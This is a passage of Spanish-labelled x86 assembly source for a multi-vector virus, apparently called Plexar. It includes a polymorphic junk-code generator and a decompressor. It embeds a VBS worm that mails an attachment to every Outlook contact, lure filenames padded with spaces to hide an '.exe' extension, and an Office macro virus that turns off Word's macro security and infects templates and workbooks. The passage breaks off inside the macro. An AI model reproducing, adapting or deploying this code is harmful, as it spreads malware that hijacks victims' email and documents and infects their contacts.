DB 029h, 0F3h ; SUB EBX, ESI
|
|||
|
DB 029h, 0C2h ; SUB EDX, EAX
|
|||
|
DB 029h, 0DAh ; SUB EDX, EBX
|
|||
|
DB 029h, 0F2h ; SUB EDX, ESI
|
|||
|
DB 029h, 0C6h ; SUB ESI, EAX
|
|||
|
DB 029h, 0DEh ; SUB ESI, EBX
|
|||
|
DB 029h, 0D6h ; SUB ESI, EDX
|
|||
|
DB 031h, 0D8h ; XOR EAX, EBX
|
|||
|
DB 031h, 0D0h ; XOR EAX, EDX
|
|||
|
DB 031h, 0F0h ; XOR EAX, ESI
|
|||
|
DB 031h, 0C3h ; XOR EBX, EAX
|
|||
|
DB 031h, 0D3h ; XOR EBX, EDX
|
|||
|
DB 031h, 0F3h ; XOR EBX, ESI
|
|||
|
DB 031h, 0C2h ; XOR EDX, EAX
|
|||
|
DB 031h, 0DAh ; XOR EDX, EBX
|
|||
|
DB 031h, 0F2h ; XOR EDX, ESI
|
|||
|
DB 031h, 0C6h ; XOR ESI, EAX
|
|||
|
DB 031h, 0DEh ; XOR ESI, EBX
|
|||
|
DB 031h, 0D6h ; XOR ESI, EDX
|
|||
|
|
|||
|
@Basura_4:
|
|||
|
MOV AL, 068h ; PUSH
|
|||
|
STOSB
|
|||
|
XOR EBX, EBX
|
|||
|
DEC EBX
|
|||
|
CALL @Aleatorio
|
|||
|
STOSD
|
|||
|
|
|||
|
PUSH 03h
|
|||
|
POP EBX
|
|||
|
CALL @Aleatorio
|
|||
|
LEA ESI, OFS [@B4_Tabla]
|
|||
|
ADD ESI, EAX
|
|||
|
MOVSB
|
|||
|
|
|||
|
JMP @BasuraR
|
|||
|
|
|||
|
@B4_Tabla:
|
|||
|
DB 058h ; POP EAX
|
|||
|
DB 05Bh ; POP EBX
|
|||
|
DB 05Ah ; POP EDX
|
|||
|
DB 05Eh ; POP ESI
|
|||
|
|
|||
|
@Basura_5:
|
|||
|
PUSH 11d
|
|||
|
POP EBX
|
|||
|
CALL @Aleatorio
|
|||
|
LEA ESI, OFS [@B5_Tabla]
|
|||
|
ADD ESI, EAX
|
|||
|
MOVSB
|
|||
|
|
|||
|
JMP @BasuraR
|
|||
|
|
|||
|
@B5_Tabla:
|
|||
|
DB 040h ; inc eax
|
|||
|
DB 043h ; inc ebx
|
|||
|
DB 042h ; inc edx
|
|||
|
DB 046h ; inc esi
|
|||
|
DB 048h ; dec eax
|
|||
|
DB 04Bh ; dec ebx
|
|||
|
DB 04Ah ; dec edx
|
|||
|
DB 04Eh ; dec esi
|
|||
|
DB 093h ; xchg ebx,eax
|
|||
|
DB 092h ; xchg edx,eax
|
|||
|
DB 096h ; xchg esi,eax
|
|||
|
DB 093h ; xchg ebx,eax
|
|||
|
|
|||
|
@Basura_6:
|
|||
|
PUSH 13d
|
|||
|
POP EBX
|
|||
|
CALL @Aleatorio
|
|||
|
LEA ESI, OFS [@B6_Tabla]
|
|||
|
ADD EAX, EAX
|
|||
|
ADD ESI, EAX
|
|||
|
MOVSW
|
|||
|
|
|||
|
JMP @BasuraR
|
|||
|
|
|||
|
@B6_Tabla:
|
|||
|
DB 0F7h, 0D0h ; not eax
|
|||
|
DB 0F7h, 0D3h ; not ebx
|
|||
|
DB 0F7h, 0D2h ; not edx
|
|||
|
DB 0F7h, 0D6h ; not esi
|
|||
|
DB 0F7h, 0D8h ; neg eax
|
|||
|
DB 0F7h, 0DBh ; neg ebx
|
|||
|
DB 0F7h, 0DAh ; neg edx
|
|||
|
DB 0F7h, 0DEh ; neg esi
|
|||
|
DB 087h, 0DAh ; xchg ebx,edx
|
|||
|
DB 087h, 0DEh ; xchg ebx,esi
|
|||
|
DB 087h, 0D3h ; xchg edx,ebx
|
|||
|
DB 087h, 0D6h ; xchg edx,esi
|
|||
|
DB 087h, 0F3h ; xchg esi,ebx
|
|||
|
DB 087h, 0F2h ; xchg esi,edx
|
|||
|
|
|||
|
@Basura_7:
|
|||
|
PUSH 31d
|
|||
|
POP EBX
|
|||
|
CALL @Aleatorio
|
|||
|
LEA ESI, OFS [@B7_Tabla]
|
|||
|
ADD EAX, EAX
|
|||
|
ADD ESI, EAX
|
|||
|
MOVSW
|
|||
|
XOR EBX, EBX
|
|||
|
DEC EBX
|
|||
|
CALL @Aleatorio
|
|||
|
STOSB
|
|||
|
|
|||
|
JMP @BasuraR
|
|||
|
|
|||
|
@B7_Tabla:
|
|||
|
DB 0C1h, 0D0h ; rcl eax
|
|||
|
DB 0C1h, 0D3h ; rcl ebx
|
|||
|
DB 0C1h, 0D2h ; rcl edx
|
|||
|
DB 0C1h, 0D6h ; rcl esi
|
|||
|
DB 0C1h, 0D8h ; rcr eax
|
|||
|
DB 0C1h, 0DBh ; rcr ebx
|
|||
|
DB 0C1h, 0DAh ; rcr edx
|
|||
|
DB 0C1h, 0DEh ; rcr esi
|
|||
|
DB 0C1h, 0C0h ; rol eax
|
|||
|
DB 0C1h, 0C3h ; rol ebx
|
|||
|
DB 0C1h, 0C2h ; rol edx
|
|||
|
DB 0C1h, 0C6h ; rol esi
|
|||
|
DB 0C1h, 0C8h ; ror eax
|
|||
|
DB 0C1h, 0CBh ; ror ebx
|
|||
|
DB 0C1h, 0CAh ; ror edx
|
|||
|
DB 0C1h, 0CEh ; ror esi
|
|||
|
DB 0C1h, 0E0h ; shl eax
|
|||
|
DB 0C1h, 0E3h ; shl ebx
|
|||
|
DB 0C1h, 0E2h ; shl edx
|
|||
|
DB 0C1h, 0E6h ; shl esi
|
|||
|
DB 0C1h, 0F8h ; sar eax
|
|||
|
DB 0C1h, 0FBh ; sar ebx
|
|||
|
DB 0C1h, 0FAh ; sar edx
|
|||
|
DB 0C1h, 0FEh ; sar esi
|
|||
|
DB 0C1h, 0E0h ; shl eax
|
|||
|
DB 0C1h, 0E3h ; shl ebx
|
|||
|
DB 0C1h, 0E2h ; shl edx
|
|||
|
DB 0C1h, 0E6h ; shl esi
|
|||
|
DB 0C1h, 0E8h ; shr eax
|
|||
|
DB 0C1h, 0EBh ; shr ebx
|
|||
|
DB 0C1h, 0EAh ; shr edx
|
|||
|
DB 0C1h, 0EEh ; shr esi
|
|||
|
|
|||
|
@SaveSemilla DB 8 DUP (00h)
|
|||
|
|
|||
|
Semilla_1 DD 00000000h
|
|||
|
Semilla_2 DD 00000000h
|
|||
|
Llave DD 00000000h
|
|||
|
|
|||
|
Origen DD 00000000h
|
|||
|
Destino DD 00000000h
|
|||
|
Tama<EFBFBD>o DD 00000000h
|
|||
|
|
|||
|
GuardaDelta DD 00000000h
|
|||
|
GuardaDelta2 DD 00000000h
|
|||
|
GuardaLoop DD 00000000h
|
|||
|
|
|||
|
Mierda_1 EQU 1A7FC23Bh
|
|||
|
Mierda_2 EQU 000028B1h
|
|||
|
Mierda_3 EQU 974D9DB5h
|
|||
|
Mierda_4 EQU 0000F3C9h
|
|||
|
|
|||
|
PXPE ENDP
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
;***************************************************************
|
|||
|
;* aPLib v0.22b - the smaller the better :) *
|
|||
|
;* WASM & TASM assembler depacker *
|
|||
|
;* *
|
|||
|
;* Copyright (c) 1998-99 by - Jibz - All Rights Reserved *
|
|||
|
;***************************************************************
|
|||
|
|
|||
|
;.386p
|
|||
|
;.MODEL flat
|
|||
|
|
|||
|
;.CODE
|
|||
|
|
|||
|
;PUBLIC _aP_depack_asm
|
|||
|
|
|||
|
_aP_depack_asm:
|
|||
|
push ebp
|
|||
|
mov ebp, esp
|
|||
|
pushad
|
|||
|
push ebp
|
|||
|
|
|||
|
mov esi, [ebp + 8] ; C calling convention
|
|||
|
mov edi, [ebp + 12]
|
|||
|
|
|||
|
cld
|
|||
|
mov dl, 80h
|
|||
|
|
|||
|
literal:
|
|||
|
movsb
|
|||
|
nexttag:
|
|||
|
call getbit
|
|||
|
jnc literal
|
|||
|
|
|||
|
xor ecx, ecx
|
|||
|
call getbit
|
|||
|
jnc codepair
|
|||
|
xor eax, eax
|
|||
|
call getbit
|
|||
|
jnc shortmatch
|
|||
|
mov al, 10h
|
|||
|
getmorebits:
|
|||
|
call getbit
|
|||
|
adc al, al
|
|||
|
jnc getmorebits
|
|||
|
jnz domatch_with_inc
|
|||
|
stosb
|
|||
|
jmp short nexttag
|
|||
|
codepair:
|
|||
|
call getgamma_no_ecx
|
|||
|
dec ecx
|
|||
|
loop normalcodepair
|
|||
|
mov eax,ebp
|
|||
|
call getgamma
|
|||
|
jmp short domatch
|
|||
|
|
|||
|
shortmatch:
|
|||
|
lodsb
|
|||
|
shr eax, 1
|
|||
|
jz donedepacking
|
|||
|
adc ecx, 2
|
|||
|
mov ebp, eax
|
|||
|
jmp short domatch
|
|||
|
|
|||
|
normalcodepair:
|
|||
|
xchg eax, ecx
|
|||
|
dec eax
|
|||
|
shl eax, 8
|
|||
|
lodsb
|
|||
|
mov ebp, eax
|
|||
|
call getgamma
|
|||
|
cmp eax, 32000
|
|||
|
jae domatch_with_2inc
|
|||
|
cmp eax, 1280
|
|||
|
jae domatch_with_inc
|
|||
|
cmp eax, 7fh
|
|||
|
ja domatch
|
|||
|
|
|||
|
domatch_with_2inc:
|
|||
|
inc ecx
|
|||
|
|
|||
|
domatch_with_inc:
|
|||
|
inc ecx
|
|||
|
domatch:
|
|||
|
push esi
|
|||
|
mov esi, edi
|
|||
|
sub esi, eax
|
|||
|
rep movsb
|
|||
|
pop esi
|
|||
|
jmp short nexttag
|
|||
|
|
|||
|
getbit:
|
|||
|
add dl, dl
|
|||
|
jnz stillbitsleft
|
|||
|
mov dl, [esi]
|
|||
|
inc esi
|
|||
|
adc dl, dl
|
|||
|
stillbitsleft:
|
|||
|
ret
|
|||
|
|
|||
|
getgamma:
|
|||
|
xor ecx, ecx
|
|||
|
getgamma_no_ecx:
|
|||
|
inc ecx
|
|||
|
getgammaloop:
|
|||
|
call getbit
|
|||
|
adc ecx, ecx
|
|||
|
call getbit
|
|||
|
jc getgammaloop
|
|||
|
ret
|
|||
|
|
|||
|
donedepacking:
|
|||
|
pop ebp
|
|||
|
sub edi, [ebp + 12]
|
|||
|
mov [ebp - 4], edi ; return unpacked length in eax
|
|||
|
|
|||
|
popad
|
|||
|
pop ebp
|
|||
|
ret
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
; Billy Belcebu's CRC32 calculator.
|
|||
|
;
|
|||
|
; CRC32 procedure
|
|||
|
; --------------+
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ESI = Offset where code to calculate begins
|
|||
|
; EDI = Size of that code
|
|||
|
; output:
|
|||
|
; EAX = CRC32 of given code
|
|||
|
;
|
|||
|
|
|||
|
CRC32 proc
|
|||
|
cld
|
|||
|
xor ecx,ecx ; Optimized by me - 2 bytes
|
|||
|
dec ecx ; less
|
|||
|
mov edx,ecx
|
|||
|
NextByteCRC:
|
|||
|
xor eax,eax
|
|||
|
xor ebx,ebx
|
|||
|
lodsb
|
|||
|
xor al,cl
|
|||
|
mov cl,ch
|
|||
|
mov ch,dl
|
|||
|
mov dl,dh
|
|||
|
mov dh,8
|
|||
|
NextBitCRC:
|
|||
|
shr bx,1
|
|||
|
rcr ax,1
|
|||
|
jnc NoCRC
|
|||
|
xor ax,08320h
|
|||
|
xor bx,0EDB8h
|
|||
|
NoCRC: dec dh
|
|||
|
jnz NextBitCRC
|
|||
|
xor ecx,eax
|
|||
|
xor edx,ebx
|
|||
|
dec edi ; 1 byte less
|
|||
|
jnz NextByteCRC
|
|||
|
not edx
|
|||
|
not ecx
|
|||
|
mov eax,edx
|
|||
|
rol eax,16
|
|||
|
mov ax,cx
|
|||
|
ret
|
|||
|
CRC32 endp
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
; Generador de numeros aleatorios para uso general.
|
|||
|
;
|
|||
|
; EBX -> Limite Superior
|
|||
|
|
|||
|
Random PROC
|
|||
|
|
|||
|
PUSH ECX EDX EDI EBX
|
|||
|
|
|||
|
LEA EDI, OFS [Mariconada]
|
|||
|
RDTSC
|
|||
|
STOSD
|
|||
|
PUSH 04h
|
|||
|
POP EDI
|
|||
|
LEA ESI, OFS [Mariconada]
|
|||
|
CALL CRC32
|
|||
|
XCHG EDX, EAX
|
|||
|
|
|||
|
PUSH EDX
|
|||
|
LEA EDI, OFS [Mariconada]
|
|||
|
APICALL GetTickCount
|
|||
|
STOSD
|
|||
|
SUB EDI, 04h
|
|||
|
XCHG EDI, ESI
|
|||
|
PUSH 04h
|
|||
|
POP EDI
|
|||
|
CALL CRC32
|
|||
|
POP EDX
|
|||
|
|
|||
|
PUSH EAX
|
|||
|
OR EAX, EDX
|
|||
|
POP ECX
|
|||
|
AND EDX, ECX
|
|||
|
|
|||
|
XOR EAX, EDX
|
|||
|
|
|||
|
POP EBX
|
|||
|
XOR EDX, EDX
|
|||
|
DIV EBX
|
|||
|
XCHG EDX, EAX
|
|||
|
|
|||
|
POP EDI EDX ECX
|
|||
|
RET
|
|||
|
|
|||
|
Mariconada DB 9 DUP (00h)
|
|||
|
|
|||
|
Random ENDP
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
; TABLA!
|
|||
|
;
|
|||
|
; Create -> 01h
|
|||
|
; File -> 02h
|
|||
|
; Map -> 03h
|
|||
|
; View -> 04h
|
|||
|
; Close -> 05h
|
|||
|
; Get -> 06h
|
|||
|
; Set -> 07h
|
|||
|
; Find -> 08h
|
|||
|
; Virtual -> 09h
|
|||
|
; Window -> 0Ah
|
|||
|
; Directory -> 0Bh
|
|||
|
; Current -> 0Ch
|
|||
|
; WaitFor -> 0Dh
|
|||
|
; Thread -> 0Eh
|
|||
|
|
|||
|
HThread DD 00000000h
|
|||
|
|
|||
|
APIs_K32 DB 01h, 02h, "A", 00h
|
|||
|
DB 01h, 02h, 03h, "pingA", 00h
|
|||
|
DB 03h, 04h, "Of", 02h, 00h
|
|||
|
DB "Unmap", 04h, "Of", 02h, 00h
|
|||
|
DB 05h, "Handle", 00h
|
|||
|
DB 06h, 02h, "Size", 00h
|
|||
|
DB 07h, 02h, "Pointer", 00h
|
|||
|
DB 07h, "EndOf", 02h, 00h
|
|||
|
DB 07h, 02h, "AttributesA", 00h
|
|||
|
DB "Write", 02h, 00h
|
|||
|
DB 08h, "First", 02h, "A", 00h
|
|||
|
DB 08h, "Next", 02h, "A", 00h
|
|||
|
DB 08h, 05h, 00h
|
|||
|
DB 09h, "Alloc", 00h
|
|||
|
DB 09h, "Free", 00h
|
|||
|
DB 06h, 0Ah, "s", 0Bh, "A", 00h
|
|||
|
DB 06h, 0Ch, 0Bh, "A", 00h
|
|||
|
DB 07h, 0Ch, 0Bh, "A", 00h
|
|||
|
DB 01h, 0Eh, 00h
|
|||
|
DB "Exit", 0Eh, 00h
|
|||
|
DB 0Dh, "MultipleObjects", 00h
|
|||
|
DB 0Dh, "SingleObject", 00h
|
|||
|
DB 06h, "TickCount", 00h
|
|||
|
DB "LoadLibraryA", 00h
|
|||
|
DB "Delete", 02h, "A", 00h
|
|||
|
DB 07h, 0Eh, "Priority", 00h
|
|||
|
DB 0FFh
|
|||
|
|
|||
|
CreateFileA DD 00000000h
|
|||
|
CreateFileMappingA DD 00000000h
|
|||
|
MapViewOfFile DD 00000000h
|
|||
|
UnmapViewOfFile DD 00000000h
|
|||
|
CloseHandle DD 00000000h
|
|||
|
GetFileSize DD 00000000h
|
|||
|
SetFilePointer DD 00000000h
|
|||
|
SetEndOfFile DD 00000000h
|
|||
|
SetFileAttributesA DD 00000000h
|
|||
|
WriteFile DD 00000000h
|
|||
|
FindFirstFileA DD 00000000h
|
|||
|
FindNextFileA DD 00000000h
|
|||
|
FindClose DD 00000000h
|
|||
|
VirtualAlloc DD 00000000h
|
|||
|
VirtualFree DD 00000000h
|
|||
|
GetWindowsDirectoryA DD 00000000h
|
|||
|
GetCurrentDirectoryA DD 00000000h
|
|||
|
SetCurrentDirectoryA DD 00000000h
|
|||
|
CreateThread DD 00000000h
|
|||
|
ExitThread DD 00000000h
|
|||
|
WaitForMultipleObjects DD 00000000h
|
|||
|
WaitForSingleObject DD 00000000h
|
|||
|
GetTickCount DD 00000000h
|
|||
|
LoadLibraryA DD 00000000h
|
|||
|
DeleteFileA DD 00000000h
|
|||
|
SetThreadPriority DD 00000000h
|
|||
|
|
|||
|
KERNEL32 DD 00000000h
|
|||
|
|
|||
|
Thread_Directa DD 00000000h
|
|||
|
Thread_WormVBS DD 00000000h
|
|||
|
Thread_IWord DD 00000000h
|
|||
|
Thread_Host DD 00000000h
|
|||
|
|
|||
|
Listo_Directa DB 00h
|
|||
|
|
|||
|
GetProcAddress DD 00000000h
|
|||
|
Exports DD 00000000h
|
|||
|
|
|||
|
CRC32_GetProcAddress EQU 0FFC97C1Fh
|
|||
|
l_GetProcAddress EQU 0Fh
|
|||
|
|
|||
|
Scriptum DD 00000000h
|
|||
|
GuardaNom DD 00000000h
|
|||
|
LargoVBS DB 00h
|
|||
|
FHandle_WVBS DD 00000000h
|
|||
|
MHandle_WVBS DD 00000000h
|
|||
|
BaseMap_WVBS DD 00000000h
|
|||
|
|
|||
|
Gusano_VBS LABEL NEAR
|
|||
|
DB 'On Error Resume Next', 0Dh, 0Ah
|
|||
|
DB 'Set Outlook = CreateObject("OutLook.Application")', 0Dh, 0Ah
|
|||
|
DB 'If ( Outlook <> "" ) Then', 0Dh, 0Ah
|
|||
|
DB 'With Outlook', 0Dh, 0Ah
|
|||
|
DB 'Set MAPI = .GetNameSpace("MAPI")', 0Dh, 0Ah
|
|||
|
DB 'End With', 0Dh, 0Ah
|
|||
|
DB 'With MAPI', 0Dh, 0Ah
|
|||
|
DB 'Set AddrList = .AddressLists', 0Dh, 0Ah
|
|||
|
DB 'End With', 0Dh, 0Ah
|
|||
|
DB 'For I = 1 to AddrList.Count', 0Dh, 0Ah
|
|||
|
DB 'With OutLook', 0Dh, 0Ah
|
|||
|
DB 'Set NuevoMail = .CreateItem(0)', 0Dh, 0Ah
|
|||
|
DB 'End With', 0Dh, 0Ah
|
|||
|
DB 'Set LibroActual = AddrList.Item(I)', 0Dh, 0Ah
|
|||
|
DB 'With NuevoMail', 0Dh, 0Ah
|
|||
|
DB '.Attachments.Add "'
|
|||
|
L_Gusano_VBS EQU $-Gusano_VBS
|
|||
|
|
|||
|
Gusano_VBS2 LABEL NEAR
|
|||
|
DB '"', 0Dh, 0Ah
|
|||
|
DB 'End With', 0Dh, 0Ah
|
|||
|
DB 'Set Yuca = LibroActual.AddressEntries', 0Dh, 0Ah
|
|||
|
DB 'With Yuca', 0Dh, 0Ah
|
|||
|
DB 'For J = 1 to .Count', 0Dh, 0Ah
|
|||
|
DB 'With NuevoMail', 0Dh, 0Ah
|
|||
|
DB 'Set bajo = .Recipients', 0Dh, 0Ah
|
|||
|
DB 'bajo.Add Yuca(J)', 0Dh, 0Ah
|
|||
|
DB 'End With', 0Dh, 0Ah
|
|||
|
DB 'Next', 0Dh, 0Ah
|
|||
|
DB 'End With', 0Dh, 0Ah
|
|||
|
DB 'With NuevoMail', 0Dh, 0Ah
|
|||
|
DB '.Send', 0Dh, 0Ah
|
|||
|
DB 'End With', 0Dh, 0Ah
|
|||
|
DB 'Next', 0Dh, 0Ah
|
|||
|
DB 'Outlook.Quit', 0Dh, 0Ah
|
|||
|
DB 'End If', 0Dh, 0Ah
|
|||
|
L_Gusano_VBS2 EQU $-Gusano_VBS2
|
|||
|
|
|||
|
Nombres_Varios DB "XD", 00h
|
|||
|
DB "Sex.jpg", 20d DUP (" "), ".exe", 00h
|
|||
|
DB "Porno.gif", 20d DUP (" "), ".exe", 00h
|
|||
|
DB "Free_XXX.jpg", 20d DUP (" "), ".exe", 00h
|
|||
|
DB "Great_Music.mp3", 20d DUP (" "), ".exe", 00h
|
|||
|
DB "Check_This.jpg", 20d DUP (" "), ".exe", 00h
|
|||
|
DB "Cool_Pics.gif", 20d DUP (" "), ".exe", 00h
|
|||
|
DB "Love_Story.html", 20d DUP (" "), ".exe", 00h
|
|||
|
DB "Sexy_Screensaver.scr", 00h
|
|||
|
DB "Free_Love_Screensaver.scr", 00h
|
|||
|
DB "Eat_My_Shorts.scr", 00h
|
|||
|
|
|||
|
Raxelp_vbs DB "raxelp.vbs", 00h
|
|||
|
WScript_exe DB "wscript.exe", 00h
|
|||
|
|
|||
|
Tabla_Hex DB "0123456789ABCDEF", 00h
|
|||
|
|
|||
|
FHandle_IW DD 00000000h
|
|||
|
MHandle_IW DD 00000000h
|
|||
|
BaseMap_IW DD 00000000h
|
|||
|
Tama<EFBFBD>o_IW DD 00000000h
|
|||
|
Memoria_IW DD 00000000h
|
|||
|
Macaco DB 13d DUP (00h)
|
|||
|
|
|||
|
Virus_Macro LABEL NEAR
|
|||
|
DB 'Attribute VB_Name = "Plexar"', 0Dh, 0Ah
|
|||
|
DB 'Sub Auto_Open()', 0Dh, 0Ah
|
|||
|
DB 'Application.OnSheetActivate = "InfXL"', 0Dh, 0Ah
|
|||
|
DB 'End Sub', 0Dh, 0Ah
|
|||
|
DB 'Sub InfXL()', 0Dh, 0Ah
|
|||
|
DB 'On Error Resume Next', 0Dh, 0Ah
|
|||
|
DB 'Set AWO = Application.ActiveWorkbook', 0Dh, 0Ah
|
|||
|
DB 'Set VBP = Application.VBE.ActiveVBProject', 0Dh, 0Ah
|
|||
|
DB 'Set AXO = AWO.VBProject.VBComponents', 0Dh, 0Ah
|
|||
|
DB 'Set VBX = VBP.VBComponents', 0Dh, 0Ah
|
|||
|
DB 'With Application: .ScreenUpdating = Not -1: .DisplayStatusBar = Not -1: .EnableCancelKey = Not -1: .DisplayAlerts = Not -1: End With', 0Dh, 0Ah
|
|||
|
DB 'ZZZ = "Plexar": XXX = "c:\plx.$$$": YYY = Application.StartupPath & "\personal.xls"', 0Dh, 0Ah
|
|||
|
DB 'VBX.Item(ZZZ).Export XXX', 0Dh, 0Ah
|
|||
|
DB 'If AXO.Item(ZZZ).Name <> ZZZ Then', 0Dh, 0Ah
|
|||
|
DB ' AXO.Import XXX: AWO.SaveAs AWO.FullName', 0Dh, 0Ah
|
|||
|
DB 'End If', 0Dh, 0Ah
|
|||
|
DB 'If (Dir(YYY) = "") Then', 0Dh, 0Ah
|
|||
|
DB 'Workbooks.Add.SaveAs YYY', 0Dh, 0Ah
|
|||
|
DB 'Set AWO = Application.ActiveWorkbook', 0Dh, 0Ah
|
|||
|
DB 'Set AXO = AWO.VBProject.VBComponents', 0Dh, 0Ah
|
|||
|
DB 'AXO.Import XXX', 0Dh, 0Ah
|
|||
|
DB 'ActiveWindow.Visible = Not -1', 0Dh, 0Ah
|
|||
|
DB 'Workbooks("personal.xls").Save', 0Dh, 0Ah
|
|||
|
DB 'End If', 0Dh, 0Ah
|
|||
|
DB 'Kill XXX', 0Dh, 0Ah
|
|||
|
DB 'Call Correme', 0Dh, 0Ah
|
|||
|
DB 'End Sub', 0Dh, 0Ah
|
|||
|
DB 'Sub AutoClose()', 0Dh, 0Ah
|
|||
|
DB 'On Error Resume Next', 0Dh, 0Ah
|
|||
|
DB 'ZZZ = "Plexar": XXX = "c:\plx.$$$"', 0Dh, 0Ah
|
|||
|
DB 'System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = "1"', 0Dh, 0Ah
|
|||
|
DB 'System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Security", "Level") = "1"', 0Dh, 0Ah
|
|||
|
DB 'With Options: .VirusProtection = (2 * 4 + 4 / 6 - 2): .ConfirmConversions = (2 * 4 + 4 / 6 - 2): End With', 0Dh, 0Ah
|
|||
|
DB 'With Application: .DisplayStatusBar = (2 * 4 + 4 / 6 - 2): End With', 0Dh, 0Ah
|
|||
|
DB 'Set AKT = VBE.ActiveVBProject.VBComponents', 0Dh, 0Ah
|
|||
|
DB 'Set NOX = NormalTemplate.VBProject.VBComponents', 0Dh, 0Ah
|
|||
|
DB 'Set DOX = ActiveDocument.VBProject.VBComponents', 0Dh, 0Ah
|
|||
|
DB 'AKT.Item(ZZZ).Export XXX', 0Dh, 0Ah
|
|||
|
DB 'If (NOX.Item(ZZZ).Name <> ZZZ) Then', 0Dh, 0Ah
|
|||
|
DB 'NOX.Import XXX', 0Dh, 0Ah
|
|||
|
DB 'NormalTemplate.Save', 0Dh, 0Ah
|
|||
|
DB 'End If', 0Dh, 0Ah
|
|||
|
DB 'If (DOX.Item(ZZZ).Name <> ZZZ) Then', 0Dh, 0Ah
|
|||
|
DB 'DOX.Import XXX', 0Dh, 0Ah
|
|||
|
DB 'ActiveDocument.SaveAs ActiveDocument.FullName', 0Dh, 0Ah
|
|||
|
DB 'End If', 0Dh, 0Ah
|
|||
|
DB 'Kill XXX', 0Dh, 0Ah
|
|||
|
DB 'Call Correme', 0Dh, 0Ah
|
|||
|
DB 'End Sub', 0Dh, 0Ah
|
|||
|
DB 'Private Sub Correme()', 0Dh, 0Ah
|
|||
|
DB 'On Error Resume Next', 0Dh, 0Ah
|
|||
|
DB 'Dim joda as String', 0Dh, 0Ah
|
|||
|
DB 'Dim X as String', 0Dh, 0Ah
|
|||
|
DB 'joda = "'
|
|||
|
L_Virus_Macro EQU $-Virus_Macro
|
|||
|
|
|||
|
Virus_Macro_2 LABEL NEAR
|
|||
|
DB 'For o = 1 to Len(joda) Step 2', 0Dh, 0Ah
|
|||
|
DB 'X = X + Chr("&h" + Mid(Joda, o, 2))', 0Dh, 0Ah
|
|||
|
DB 'Next', 0Dh, 0Ah
|
|||
|
DB 'raxname = Environ("windir") & "\raxelp.exe"', 0Dh, 0Ah
|
|||
|
DB 'Open raxname For Binary As #1', 0Dh, 0Ah
|
|||
|
